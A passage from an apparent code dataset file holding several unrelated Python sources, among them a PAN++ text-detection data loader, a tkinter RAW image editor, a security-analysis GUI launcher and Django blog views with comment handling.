ct_root_dir + 'train2014/'\nct_train_gt_path = ct_root_dir + 'COCO_Text.json'\n\nic15_root_dir = './data/ICDAR2015/Challenge4/'\nic15_train_data_dir = ic15_root_dir + 'ch4_training_images/'\nic15_train_gt_dir = ic15_root_dir + \\\n 'ch4_training_localization_transcription_gt/'\n\ntt_root_dir = './data/total_text/'\ntt_train_data_dir = tt_root_dir + 'Images/Train/'\ntt_train_gt_dir = tt_root_dir + 'Groundtruth/Polygon/Train/'\n\n\ndef get_img(img_path, read_type='cv2'):\n try:\n if read_type == 'cv2':\n img = cv2.imread(img_path)\n img = img[:, :, [2, 1, 0]]\n elif read_type == 'pil':\n img = np.array(Image.open(img_path))\n except Exception:\n print(img_path)\n raise\n return img\n\n\ndef check(s):\n for c in s:\n if c in list(string.printable[:-6]):\n continue\n return False\n return True\n\n\ndef get_ann_synth(img, gts, texts, index):\n bboxes = np.array(gts[index])\n bboxes = np.reshape(bboxes, (bboxes.shape[0], bboxes.shape[1], -1))\n bboxes = bboxes.transpose(2, 1, 0)\n bboxes = np.reshape(\n bboxes, (bboxes.shape[0], -1)) / ([img.shape[1], img.shape[0]] * 4)\n\n words = []\n for text in texts[index]:\n text = text.replace('\\n', ' ').replace('\\r', ' ')\n words.extend([w for w in text.split(' ') if len(w) > 0])\n\n return bboxes, words\n\n\ndef get_ann_ic17(img, gt_path):\n h, w = img.shape[0:2]\n lines = mmcv.list_from_file(gt_path)\n bboxes = []\n words = []\n for line in lines:\n line = line.encode('utf-8').decode('utf-8-sig')\n line = line.replace('\\xef\\xbb\\xbf', '')\n gt = line.split(',')\n word = gt[9].replace('\\r', '').replace('\\n', '')\n\n if len(word) == 0 or word[0] == '#':\n words.append('###')\n elif not check(word):\n words.append('???')\n else:\n words.append(word)\n\n bbox = [int(gt[i]) for i in range(8)]\n bbox = np.array(bbox) / ([w * 1.0, h * 1.0] * 4)\n bboxes.append(bbox)\n return np.array(bboxes), words\n\n\ndef get_ann_ct(img, anns):\n h, w = img.shape[0:2]\n bboxes = []\n words = []\n for ann in anns:\n bbox = ann['polygon']\n bbox = np.array(bbox) / ([w * 1.0, h * 1.0] * (len(bbox) // 2))\n bboxes.append(bbox)\n\n if 'utf8_string' not in ann:\n words.append('###')\n else:\n word = ann['utf8_string']\n if not check(word):\n words.append('???')\n else:\n words.append(word)\n\n return np.array(bboxes), words\n\n\ndef get_ann_ic15(img, gt_path):\n h, w = img.shape[0:2]\n lines = mmcv.list_from_file(gt_path)\n bboxes = []\n words = []\n for line in lines:\n line = line.encode('utf-8').decode('utf-8-sig')\n line = line.replace('\\xef\\xbb\\xbf', '')\n gt = line.split(',')\n word = gt[8].replace('\\r', '').replace('\\n', '')\n if word[0] == '#':\n words.append('###')\n else:\n words.append(word)\n\n bbox = [int(gt[i]) for i in range(8)]\n bbox = np.array(bbox) / ([w * 1.0, h * 1.0] * 4)\n bboxes.append(bbox)\n return np.array(bboxes), words\n\n\ndef get_ann_tt(img, gt_path):\n h, w = img.shape[0:2]\n bboxes = []\n words = []\n\n data = scio.loadmat(gt_path)\n data_polygt = data['polygt']\n for i, lines in enumerate(data_polygt):\n X = np.array(lines[1])\n Y = np.array(lines[3])\n\n point_num = len(X[0])\n word = lines[4]\n if len(word) == 0:\n word = '???'\n else:\n word = word[0]\n # word = word[0].encode(\"utf-8\")\n\n if word == '#':\n word = '###'\n\n words.append(word)\n\n arr = np.concatenate([X, Y]).T\n bbox = []\n for i in range(point_num):\n bbox.append(arr[i][0])\n bbox.append(arr[i][1])\n bbox = np.asarray(bbox) / ([w * 1.0, h * 1.0] * point_num)\n bboxes.append(bbox)\n\n return bboxes, words\n\n\ndef random_horizontal_flip(imgs):\n if random.random() < 0.5:\n for i in range(len(imgs)):\n imgs[i] = np.flip(imgs[i], axis=1).copy()\n return imgs\n\n\ndef random_rotate(imgs):\n max_angle = 10\n angle = random.random() * 2 * max_angle - max_angle\n for i in range(len(imgs)):\n img = imgs[i]\n w, h = img.shape[:2]\n rotation_matrix = cv2.getRotationMatrix2D((h / 2, w / 2), angle, 1)\n img_rotation = cv2.warpAffine(img,\n rotation_matrix, (h, w),\n flags=cv2.INTER_NEAREST)\n imgs[i] = img_rotation\n return imgs\n\n\ndef scale_aligned(img, h_scale, w_scale):\n h, w = img.shape[0:2]\n h = int(h * h_scale + 0.5)\n w = int(w * w_scale + 0.5)\n if h % 32 != 0:\n h = h + (32 - h % 32)\n if w % 32 != 0:\n w = w + (32 - w % 32)\n img = cv2.resize(img, dsize=(w, h))\n return img\n\n\ndef random_scale(img, min_size, short_size=736):\n h, w = img.shape[0:2]\n\n scale = np.random.choice(np.array([0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3]))\n scale = (scale * short_size) / min(h, w)\n\n aspect = np.random.choice(np.array([0.9, 0.95, 1.0, 1.05, 1.1]))\n h_scale = scale * math.sqrt(aspect)\n w_scale = scale / math.sqrt(aspect)\n # print (h_scale, w_scale, h_scale / w_scale)\n\n img = scale_aligned(img, h_scale, w_scale)\n return img\n\n\ndef random_crop_padding(imgs, target_size):\n \"\"\"using padding and the final crop size is (800, 800)\"\"\"\n h, w = imgs[0].shape[0:2]\n t_w, t_h = target_size\n p_w, p_h = target_size\n if w == t_w and h == t_h:\n return imgs\n\n t_h = t_h if t_h < h else h\n t_w = t_w if t_w < w else w\n\n if random.random() > 3.0 / 8.0 and np.max(imgs[1]) > 0:\n # make sure to crop the text region\n tl = np.min(np.where(imgs[1] > 0), axis=1) - (t_h, t_w)\n tl[tl < 0] = 0\n br = np.max(np.where(imgs[1] > 0), axis=1) - (t_h, t_w)\n br[br < 0] = 0\n br[0] = min(br[0], h - t_h)\n br[1] = min(br[1], w - t_w)\n\n i = random.randint(tl[0], br[0]) if tl[0] < br[0] else 0\n j = random.randint(tl[1], br[1]) if tl[1] < br[1] else 0\n else:\n i = random.randint(0, h - t_h) if h - t_h > 0 else 0\n j = random.randint(0, w - t_w) if w - t_w > 0 else 0\n\n n_imgs = []\n for idx in range(len(imgs)):\n if len(imgs[idx].shape) == 3:\n s3_length = int(imgs[idx].shape[-1])\n img = imgs[idx][i:i + t_h, j:j + t_w, :]\n img_p = cv2.copyMakeBorder(img,\n 0,\n p_h - t_h,\n 0,\n p_w - t_w,\n borderType=cv2.BORDER_CONSTANT,\n value=tuple(0\n for i in range(s3_length)))\n else:\n img = imgs[idx][i:i + t_h, j:j + t_w]\n img_p = cv2.copyMakeBorder(img,\n 0,\n p_h - t_h,\n 0,\n p_w - t_w,\n borderType=cv2.BORDER_CONSTANT,\n value=(0,))\n n_imgs.append(img_p)\n return n_imgs\n\n\ndef update_word_mask(instance, instance_before_crop, word_mask):\n labels = np.unique(instance)\n\n for label in labels:\n if label == 0:\n continue\n ind = instance == label\n if np.sum(ind) == 0:\n word_mask[label] = 0\n continue\n ind_before_crop = instance_before_crop == label\n # print(np.sum(ind), np.sum(ind_before_crop))\n if float(np.sum(ind)) / np.sum(ind_before_crop) > 0.9:\n continue\n word_mask[label] = 0\n\n return word_mask\n\n\ndef dist(a, b):\n return np.linalg.norm((a - b), ord=2, axis=0)\n\n\ndef perimeter(bbox):\n peri = 0.0\n for i in range(bbox.shape[0]):\n peri += dist(bbox[i], bbox[(i + 1) % bbox.shape[0]])\n return peri\n\n\ndef shrink(bboxes, rate, max_shr=20):\n rate = rate * rate\n shrinked_bboxes = []\n for bbox in bboxes:\n area = plg.Polygon(bbox).area()\n peri = perimeter(bbox)\n\n try:\n pco = pyclipper.PyclipperOffset()\n pco.AddPath(bbox, pyclipper.JT_ROUND, pyclipper.ET_CLOSEDPOLYGON)\n offset = min(int(area * (1 - rate) / (peri + 0.001) + 0.5),\n max_shr)\n\n shrinked_bbox = pco.Execute(-offset)\n if len(shrinked_bbox) == 0:\n shrinked_bboxes.append(bbox)\n continue\n\n shrinked_bbox = np.array(shrinked_bbox[0])\n if shrinked_bbox.shape[0] <= 2:\n shrinked_bboxes.append(bbox)\n continue\n\n shrinked_bboxes.append(shrinked_bbox)\n except Exception:\n print('area:', area, 'peri:', peri)\n shrinked_bboxes.append(bbox)\n\n return shrinked_bboxes\n\n\ndef get_vocabulary(voc_type, EOS='EOS', PADDING='PAD', UNKNOWN='UNK'):\n if voc_type == 'LOWERCASE':\n voc = list(string.digits + string.ascii_lowercase)\n elif voc_type == 'ALLCASES':\n voc = list(string.digits + string.ascii_letters)\n elif voc_type == 'ALLCASES_SYMBOLS':\n voc = list(string.printable[:-6])\n else:\n raise KeyError('voc_type must be one of \"LOWERCASE\", '\n '\"ALLCASES\", \"ALLCASES_SYMBOLS\"')\n\n # update the voc with specifical chars\n voc.append(EOS)\n voc.append(PADDING)\n voc.append(UNKNOWN)\n\n char2id = dict(zip(voc, range(len(voc))))\n id2char = dict(zip(range(len(voc)), voc))\n\n return voc, char2id, id2char\n\n\nclass PAN_PP_Joint_Train(data.Dataset):\n def __init__(self,\n split='train',\n is_transform=False,\n img_size=None,\n short_size=736,\n kernel_scale=0.5,\n with_rec=False,\n read_type='pil',\n report_speed=False,\n debug=False):\n self.split = split\n self.is_transform = is_transform and not debug\n\n self.img_size = img_size if (\n img_size is None or isinstance(img_size, tuple)) else (img_size,\n img_size)\n self.kernel_scale = kernel_scale\n self.short_size = short_size\n self.for_rec = with_rec\n self.read_type = read_type\n self.report_speed = report_speed\n self.debug = debug\n\n self.img_paths = {}\n self.gts = {}\n self.texts = {}\n\n self.img_num = 0\n # synth\n data = scio.loadmat(synth_train_gt_path)\n self.img_paths['synth'] = data['imnames'][0]\n self.gts['synth'] = data['wordBB'][0]\n self.texts['synth'] = data['txt'][0]\n self.img_num += len(self.img_paths['synth'])\n\n # ic17\n self.img_paths['ic17'] = []\n self.gts['ic17'] = []\n img_names = [\n img_name\n for img_name in mmcv.utils.scandir(ic17_train_data_dir, '.jpg')\n ]\n img_names.extend([\n img_name\n for img_name in mmcv.utils.scandir(ic17_train_data_dir, '.png')\n ])\n for idx, img_name in enumerate(img_names):\n img_path = ic17_train_data_dir + img_name\n self.img_paths['ic17'].append(img_path)\n\n gt_name = 'gt_' + img_name.split('.')[0] + '.txt'\n gt_path = ic17_train_gt_dir + gt_name\n self.gts['ic17'].append(gt_path)\n self.img_num += len(self.img_paths['ic17'])\n\n # coco_text\n self.ct = COCO_Text(ct_train_gt_path)\n self.img_paths['ct'] = self.ct.getImgIds(imgIds=self.ct.train,\n catIds=[('legibility',\n 'legible')])\n self.img_num += len(self.img_paths['ct'])\n\n # ic15\n self.img_paths['ic15'] = []\n self.gts['ic15'] = []\n img_names = [\n img_name\n for img_name in mmcv.utils.scandir(ic15_train_data_dir, '.jpg')\n ]\n img_names.extend([\n img_name\n for img_name in mmcv.utils.scandir(ic15_train_data_dir, '.png')\n ])\n for idx, img_name in enumerate(img_names):\n img_path = ic15_train_data_dir + img_name\n self.img_paths['ic15'].append(img_path)\n\n gt_name = 'gt_' + img_name.split('.')[0] + '.txt'\n gt_path = ic15_train_gt_dir + gt_name\n self.gts['ic15'].append(gt_path)\n self.img_num += len(self.img_paths['ic15'])\n\n # tt\n self.img_paths['tt'] = []\n self.gts['tt'] = []\n img_names = [\n img_name\n for img_name in mmcv.utils.scandir(tt_train_data_dir, '.jpg')\n ]\n img_names.extend([\n img_name\n for img_name in mmcv.utils.scandir(tt_train_data_dir, '.png')\n ])\n\n for idx, img_name in enumerate(img_names):\n img_path = tt_train_data_dir + img_name\n self.img_paths['tt'].append(img_path)\n\n gt_name = 'poly_gt_' + img_name.split('.')[0] + '.mat'\n gt_path = tt_train_gt_dir + gt_name\n self.gts['tt'].append(gt_path)\n self.img_num += len(self.img_paths['tt'])\n\n self.voc, self.char2id, self.id2char = get_vocabulary('LOWERCASE')\n self.max_word_num = 200\n self.max_word_len = 32\n print('reading type: %s.' % self.read_type)\n\n def __len__(self):\n return self.img_num\n\n def load_synth_single(self, index):\n img_path = synth_train_data_dir + self.img_paths['synth'][index][0]\n img = get_img(img_path, self.read_type)\n bboxes, words = get_ann_synth(img, self.gts['synth'],\n self.texts['synth'], index)\n return img, bboxes, words\n\n def load_ic17_single(self, index):\n img_path = self.img_paths['ic17'][index]\n gt_path = self.gts['ic17'][index]\n img = get_img(img_path, self.read_type)\n bboxes, words = get_ann_ic17(img, gt_path)\n return img, bboxes, words\n\n def load_ct_single(self, index):\n img_meta = self.ct.loadImgs(self.img_paths['ct'][index])[0]\n img_path = ct_train_data_dir + img_meta['file_name']\n img = get_img(img_path, self.read_type)\n\n annIds = self.ct.getAnnIds(imgIds=img_meta['id'])\n anns = self.ct.loadAnns(annIds)\n bboxes, words = get_ann_ct(img, anns)\n\n return img, bboxes, words\n\n def load_ic15_single(self, index):\n img_path = self.img_paths['ic15'][index]\n gt_path = self.gts['ic15'][index]\n img = get_img(img_path, self.read_type)\n bboxes, words = get_ann_ic15(img, gt_path)\n return img, bboxes, words\n\n def load_tt_single(self, index):\n img_path = self.img_paths['tt'][index]\n gt_path = self.gts['tt'][index]\n img = get_img(img_path, self.read_type)\n bboxes, words = get_ann_tt(img, gt_path)\n return img, bboxes, words\n\n def __getitem__(self, index):\n choice = random.random()\n\n if self.debug:\n # index = 0\n img, bboxes, words = self.load_ic15_single(index)\n elif choice < 1.0 / 5.0:\n index = random.randint(0, len(self.img_paths['synth']) - 1)\n img, bboxes, words = self.load_synth_single(index)\n elif choice < 2.0 / 5.0:\n index = random.randint(0, len(self.img_paths['ic17']) - 1)\n img, bboxes, words = self.load_ic17_single(index)\n elif choice < 3.0 / 5.0:\n index = random.randint(0, len(self.img_paths['ct']) - 1)\n img, bboxes, words = self.load_ct_single(index)\n elif choice < 4.0 / 5.0:\n index = random.randint(0, len(self.img_paths['ic15']) - 1)\n img, bboxes, words = self.load_ic15_single(index)\n else:\n index = random.randint(0, len(self.img_paths['tt']) - 1)\n img, bboxes, words = self.load_tt_single(index)\n\n if len(bboxes) > self.max_word_num:\n bboxes = bboxes[:self.max_word_num]\n words = words[:self.max_word_num]\n\n gt_words = np.full((self.max_word_num + 1, self.max_word_len),\n self.char2id['PAD'],\n dtype=np.int32)\n word_mask = np.zeros((self.max_word_num + 1,), dtype=np.int32)\n for i, word in enumerate(words):\n if word == '###':\n continue\n if word == '???':\n continue\n word = word.lower()\n gt_word = np.full((self.max_word_len,),\n self.char2id['PAD'],\n dtype=np.int)\n for j, char in enumerate(word):\n if j > self.max_word_len - 1:\n break\n if char in self.char2id:\n gt_word[j] = self.char2id[char]\n else:\n gt_word[j] = self.char2id['UNK']\n if len(word) > self.max_word_len - 1:\n gt_word[-1] = self.char2id['EOS']\n else:\n gt_word[len(word)] = self.char2id['EOS']\n gt_words[i + 1] = gt_word\n word_mask[i + 1] = 1\n\n if self.is_transform:\n img = random_scale(img, self.img_size[0], self.short_size)\n\n gt_instance = np.zeros(img.shape[0:2], dtype='uint8')\n training_mask = np.ones(img.shape[0:2], dtype='uint8')\n if len(bboxes) > 0:\n if type(bboxes) == list:\n for i in range(len(bboxes)):\n bboxes[i] = np.reshape(\n bboxes[i] * ([img.shape[1], img.shape[0]] *\n (bboxes[i].shape[0] // 2)),\n (bboxes[i].shape[0] // 2, 2)).astype('int32')\n else:\n bboxes = np.reshape(\n bboxes * ([img.shape[1], img.shape[0]] *\n (bboxes.shape[1] // 2)),\n (bboxes.shape[0], -1, 2)).astype('int32')\n for i in range(len(bboxes)):\n cv2.drawContours(gt_instance, [bboxes[i]], -1, i + 1, -1)\n if words[i] == '###':\n cv2.drawContours(training_mask, [bboxes[i]], -1, 0, -1)\n\n gt_kernels = []\n for rate in [self.kernel_scale]:\n gt_kernel = np.zeros(img.shape[0:2], dtype='uint8')\n kernel_bboxes = shrink(bboxes, rate)\n for i in range(len(bboxes)):\n cv2.drawContours(gt_kernel, [kernel_bboxes[i]], -1, 1, -1)\n gt_kernels.append(gt_kernel)\n\n if self.is_transform:\n imgs = [img, gt_instance, training_mask]\n imgs.extend(gt_kernels)\n\n if not self.for_rec:\n imgs = random_horizontal_flip(imgs)\n imgs = random_rotate(imgs)\n gt_instance_before_crop = imgs[1].copy()\n imgs = random_crop_padding(imgs, self.img_size)\n img, gt_instance, training_mask, gt_kernels = \\\n imgs[0], imgs[1], imgs[2], imgs[3:]\n word_mask = update_word_mask(gt_instance, gt_instance_before_crop,\n word_mask)\n\n gt_text = gt_instance.copy()\n gt_text[gt_text > 0] = 1\n gt_kernels = np.array(gt_kernels)\n\n max_instance = np.max(gt_instance)\n gt_bboxes = np.zeros((self.max_word_num + 1, 4), dtype=np.int32)\n for i in range(1, max_instance + 1):\n ind = gt_instance == i\n if np.sum(ind) == 0:\n continue\n points = np.array(np.where(ind)).transpose((1, 0))\n tl = np.min(points, axis=0)\n br = np.max(points, axis=0) + 1\n gt_bboxes[i] = (tl[0], tl[1], br[0], br[1])\n\n if self.is_transform:\n img = Image.fromarray(img)\n img = img.convert('RGB')\n img = transforms.ColorJitter(brightness=32.0 / 255,\n saturation=0.5)(img)\n else:\n img = Image.fromarray(img)\n img = img.convert('RGB')\n\n img = transforms.ToTensor()(img)\n img = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])(img)\n\n gt_text = torch.from_numpy(gt_text).long()\n gt_kernels = torch.from_numpy(gt_kernels).long()\n training_mask = torch.from_numpy(training_mask).long()\n gt_instance = torch.from_numpy(gt_instance).long()\n gt_bboxes = torch.from_numpy(gt_bboxes).long()\n gt_words = torch.from_numpy(gt_words).long()\n word_mask = torch.from_numpy(word_mask).long()\n\n data = dict(\n imgs=img,\n gt_texts=gt_text,\n gt_kernels=gt_kernels,\n training_masks=training_mask,\n gt_instances=gt_instance,\n gt_bboxes=gt_bboxes,\n )\n if self.for_rec:\n data.update(dict(gt_words=gt_words, word_masks=word_mask))\n\n return data\n\n\nif __name__ == '__main__':\n data_loader = PAN_PP_Joint_Train(split='train',\n is_transform=True,\n img_size=736,\n short_size=736,\n kernel_scale=0.5,\n read_type='pil',\n with_rec=True)\n train_loader = torch.utils.data.DataLoader(data_loader,\n batch_size=8,\n shuffle=False,\n num_workers=8,\n drop_last=True,\n pin_memory=True)\n for item in train_loader:\n print('-' * 20)\n for k, v in item.items():\n print(f'k: {k}, v.shape: {v.shape}')\n","repo_name":"whai362/pan_pp.pytorch","sub_path":"dataset/pan_pp/pan_pp_joint_train.py","file_name":"pan_pp_joint_train.py","file_ext":"py","file_size_in_byte":22864,"program_lang":"python","lang":"en","doc_type":"code","stars":426,"dataset":"github-code","pt":"35"} +{"seq_id":"9031613808","text":"import random as r\nclass myclass:\n \"\"\"Напишите программу с классом, объекты которого можно вызывать. У объекта класса должно быть поле-список с числовыми значениями,\nа результатом метод возвращает полиномиальную сумму. В частности, если в списке содержатся числа a0, a1, …, an и в качестве аргумента объ-\nекту при вызове передается значение x, то в качестве результата должно возвращаться значение a0 + a1x + a2x2 + … + anxn.\"\"\"\n def __call__(self,x):\n s=0\n n=0\n for i in self.list1:\n s+=i*(x**n)\n n+=1\n return s\n \n\n \nA=myclass()\nA.list1=[1,2,3,4]\nx=3\nprint(f\"Полиномиальная сумма для списка {A.list1} и числа x={x} равна: {A(x)}.\")\n\n","repo_name":"AntonUpro/Learn-Python","sub_path":"chapter 9/task 8.py","file_name":"task 8.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26793659723","text":"from tkinter import *\nfrom tkinter.filedialog import *\nfrom tkinter.simpledialog import *\nimport os.path\nimport math\n\n## 함수 선언 부분 ##\ndef loadImage(fname) :\n global window, canvas, paper, filename, XSIZE, YSIZE, inImage, filename\n\n inImage=[]\n fsize = os.path.getsize(fname) # 파일의 크기\n XSIZE = YSIZE = int(math.sqrt(fsize)) # 정방형으로 가정하고 크기 구함\n \n fp = open(fname, 'rb') \n\n for i in range(0, XSIZE) :\n tmpList = []\n for k in range(0, YSIZE) :\n data = int(ord(fp.read(1)))\n tmpList.append(data)\n inImage.append(tmpList)\n\n fp.close()\n\ndef displayImage(image) :\n global window, canvas, paper, filename, XSIZE, YSIZE, inImage, filename\n for i in range(0, XSIZE) :\n for k in range(0, YSIZE) :\n data = image[i][k]\n paper.put(\"#%02x%02x%02x\" % (data,data,data), (k, i))\n\ndef func_open() :\n global window, canvas, paper, filename, XSIZE, YSIZE, inImage, filename\n\n filename = askopenfilename(parent = window, filetypes = ((\"RAW 파일\", \"*.raw\"), (\"모든 파일\", \"*.*\")))\n if filename == '' : # 대화상자에서 취소를 눌렀으면\n return\n \n if canvas != None : # 기존에 열린 적이 있으면 제거\n canvas.destroy()\n\n # 파일 --> 메모리\n loadImage(filename)\n \n window.geometry(str(XSIZE) + 'x' + str(YSIZE)) # 윈도창 크기\n canvas = Canvas(window, height = XSIZE, width = YSIZE)\n paper = PhotoImage(width = XSIZE, height = YSIZE)\n canvas.create_image( (XSIZE / 2, YSIZE / 2), image = paper, state = \"normal\")\n \n # 메모리 --> 화면 \n displayImage(inImage)\n \n canvas.pack()\n\ndef func_exit() :\n window.quit()\n window.destroy()\n\ndef brightPhoto() :\n global window, canvas, paper, filename, XSIZE, YSIZE, inImage, filename\n value = 0\n value = askinteger('밝게', '값 입력', minvalue = 1, maxvalue = 255)\n\n for i in range(0, XSIZE) :\n for k in range(0, YSIZE) :\n data = inImage[i][k] + value\n if data > 255 :\n newData = 255\n else :\n newData = data\n inImage[i][k] = newData\n\n displayImage(inImage)\n\ndef darkPhoto() :\n global window, canvas, paper, filename, XSIZE, YSIZE, inImage, filename\n value = 0\n value = askinteger('어둡게', '값 입력', minvalue = 1, maxvalue = 255)\n\n for i in range(0, XSIZE) :\n for k in range(0, YSIZE) :\n data = inImage[i][k] - value\n if data < 0 :\n newData = 0\n else :\n newData = data\n inImage[i][k] = newData\n\n displayImage(inImage)\n\ndef reversePhoto() :\n global window, canvas, paper, filename, XSIZE, YSIZE, inImage, filename\n\n for i in range(0, XSIZE) :\n for k in range(0, YSIZE) :\n data = inImage[i][k]\n newData = 255 - data\n inImage[i][k] = newData\n\n displayImage(inImage)\n\n## 전역 변수 선언 부분 ##\nwindow = None\ncanvas = None\nXSIZE, YSIZE=0, 0\ninImage = [] # 2차원 리스트 (메모리)\nfilename = '' # 파일이름 (전역 변수)\n\n## 메인 코드 부분 ##\nif __name__ == \"__main__\" :\n window=Tk()\n window.title(\"흑백 사진 보기(메뉴)\")\n \n # 메뉴 추가\n mainMenu = Menu(window)\n window.config(menu=mainMenu)\n fileMenu = Menu(mainMenu)\n mainMenu.add_cascade(label = \"파일\", menu = fileMenu)\n fileMenu.add_command(label = \"파일 열기\", command = func_open)\n fileMenu.add_separator()\n fileMenu.add_command(label = \"프로그램 종료\", command = func_exit)\n\n photoMenu = Menu(mainMenu)\n mainMenu.add_cascade(label = \"사진효과\", menu = photoMenu)\n photoMenu.add_command(label = \"밝게하기\", command = brightPhoto)\n photoMenu.add_command(label = \"어둡게하기\", command = darkPhoto)\n photoMenu.add_command(label = \"반전 이미지\", command = reversePhoto)\n\n window.mainloop()\n","repo_name":"Leeyoungsup/python_pratice","sub_path":"출석과제10/Ex11-02.py","file_name":"Ex11-02.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"36297505041","text":"from tkinter import *\r\nfrom tkintertoolbox import *\r\nimport Homologous_detection\r\nimport Bugdetectionuniversalframe\r\nimport CFG\r\nimport stack0verf10w\r\nimport formatstring\r\nimport intsign\r\nimport subcontent\r\n\r\n\r\nclass window(object):\r\n\t\"\"\"description of class\"\"\"\r\n\tdef deploymainwindow(self):\r\n\t\troot=Tk()\r\n\t\troot.resizable(width=False, height=False)\r\n\t\tself.tktool=tkintertoolbox()\r\n\t\tcenter_window(root,500,300)\r\n\t\troot.title(\"SoftWare SEC\")\r\n\t\tfr1=Frame(root)\r\n\t\tButton(fr1,text=\"源代码审计\",command=self.deployHomologousDetection,width=16).grid(row=0,column=0)\r\n\t\tButton(fr1,text=\"源代码审计-CFG\",command=self.deployCFG,width=16).grid(row=0,column=1)\r\n\t\tButton(fr1,text=\"栈溢出检查\",command=self.deployoverflow,width=16).grid(row=0,column=2)\r\n\t\tButton(fr1,text=\"格式化字符串\",command=self.deployformat,width=16).grid(row=1,column=0)\r\n\t\tButton(fr1,text=\"整数符号溢出(With Multiprocess)\",command=self.deployintsign,width=16).grid(row=1,column=1)\r\n\t\tButton(fr1,text=\"DLC\",command=self.deploydlc,width=16).grid(row=1,column=2)\r\n\t\tfr2=Frame(root)\r\n\t\tButton(fr2,text=\"Quit\",command=root.destroy,width=8).pack(side='right',padx=10)\r\n\t\tButton(fr2,text=\"Info\",command=self.deployinfowindow,width=8).pack(side='right',padx=10)\r\n\t\tfr3=Frame(root)\r\n\t\tButton(fr3,text=\"Empty pointer\",width=8).pack(padx=5)\r\n\t\tButton(fr3,text=\"Empty pointer\",width=8).pack(padx=5)\r\n\t\tfr1.pack(pady=10,anchor='center')\r\n\t\tfr2.pack(pady=10,anchor='center')\r\n\t\troot.mainloop()\r\n\tdef deployinfowindow(self):\r\n\t\troot=Tk()\r\n\t\troot.title(\"Info\")\r\n\t\troot.resizable(width=False, height=False)\r\n\t\ttkintertoolbox.center_window(root,300,200)\r\n\t\ttextfr=Frame(root)\r\n\t\tLabel(textfr,text=\"Designed by Iridium\\nhttps://github.com/POTASSIUM7429\\n19/8~19/9\\n\",borderwidth=3, relief=\"groove\").pack(side='right')\r\n\t\tbotfr=Frame(root)\r\n\t\tButton(botfr,text=\"Exit\",command=root.destroy,width=8).pack()\r\n\t\ttextfr.pack(pady=10)\r\n\t\tbotfr.pack(pady=10)\r\n\t\troot.mainloop()\r\n\r\n\tdef deployHomologousDetection(self):\r\n\t\ts1=Homologous_detection.Homologous_detection()\r\n\r\n\tdef deployCFG(self):\r\n\t\ts2=CFG.CFG()\r\n\r\n\tdef deployoverflow(self):\r\n\t\ts3=stack0verf10w.overflowdetection()\r\n\tdef deployformat(self):\r\n\t\ts4=formatstring.formatdetection()\r\n\tdef deployintsign(self):\r\n\t\ts5=intsign.intsign()\r\n\tdef deploydlc(self):\r\n\t\t\r\n\t\ts6=subcontent.subwindow()\r\n\t\ts6.pool.close()\r\n\t\ts6.pool.join()\r\n\r\n\r\n","repo_name":"iridium-soda/Software-Security-Course-Design","sub_path":"Source/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3680052491","text":"from datetime import datetime\nfrom django.core.paginator import Paginator\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponse\nfrom django.views import View\nfrom .models import *\nfrom .forms import CommentForm\n\n\"\"\"тут описываем логику работы программы при получении запроса\"\"\"\n\n\ndef my_paginator(request, all_posts, number_posts=8):\n paginator = Paginator(all_posts, number_posts) # создаем объект пагинатор, чтобы на 1 стр 4 поста было\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n return page_obj\n\n\nclass PostListView(View):\n \"\"\"Вывод статей по категориям, тэгам, домашняя страница\"\"\"\n\n # def my_paginator(self,request, all_posts, number_posts=8):\n # paginator = Paginator(all_posts, number_posts) # создаем объект пагинатор, чтобы на 1 стр 4 поста было\n # page_number = request.GET.get('page')\n # page_obj = paginator.get_page(page_number)\n # return page_obj\n\n def get_queryset(self):\n return Post.objects.filter(published_date__lte=datetime.now(), published=True)\n\n def get(self, request, category_slug=None, slug=None):\n \"\"\"Очень умный орм запрос, получаемый объект куери сет объект постов мы ставим фильтр,\n чтобы слаг категории внутри объекта поста совпадал со слагом с маршрута юрл\"\"\"\n \"\"\"Два подчеркивания это обращение\"\"\"\n tags = Tag.objects.all()\n template = 'blog/index.html' # шаблон по умолчанию\n if category_slug is not None: # если в запрос пришло название категории\n all_posts = self.get_queryset().filter(category__slug=category_slug, category__published=True)# сортировка по категориям\n page_obj = my_paginator(request, all_posts)\n elif slug is not None: # если в запрос пришло название тэга\n all_posts = self.get_queryset().filter(tags__slug=slug) # сортировка по тегам\n page_obj = my_paginator(request, all_posts)\n return render(request, template, {\n 'page_obj': page_obj,\n \"tags\": tags\n })\n\n\nclass PostDetailView(View):\n \"\"\"Класс открывающий всю статью\"\"\"\n\n def get(self, request, **kwargs):\n \"\"\"Описываем что будет делать метод get\"\"\"\n\n post = get_object_or_404(Post, slug=kwargs.get(\"slug\"))\n comment_all = post.comments.all()\n page_obj = my_paginator(request, comment_all, 6) # Опубликовать только 6 комментов\n tags = Tag.objects.all()\n form = CommentForm()\n return render(request, post.template,\n { \"post\": post,\n \"form\": form,\n \"tags\": tags,\n \"page_obj\": page_obj,\n }\n )\n\n\n def post(self, request, **kwargs):\n # Comment.objects.create( # первый метод создания объекта для записи в базу данных\n # author=request.user,\n # post_id=request.POST.get(\"post\"),\n # text=request.POST.get(\"text\")\n # )\n # comment = Comment() # второй способ записи данных в базу данных\n # comment.author = request.user\n # comment.post_id = request.POST.get(\"post\")\n # comment.text = request.POST.get(\"text\")\n # comment.save()\n print(request.POST)\n print(kwargs)\n form = CommentForm(request.POST) # создается объект с заполненными даными для БД\n if form.is_valid(): # если отправленные данные валидны\n form = form.save(commit=False)\n form.post = Post.objects.get(slug=kwargs.get(\"slug\"))\n form.author = request.user\n form.save()\n return redirect(request.path)\n\n","repo_name":"RihardXXX/shop","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4397,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18049120671","text":"__author__ = \"V. Armando Sole\"\n__contact__ = 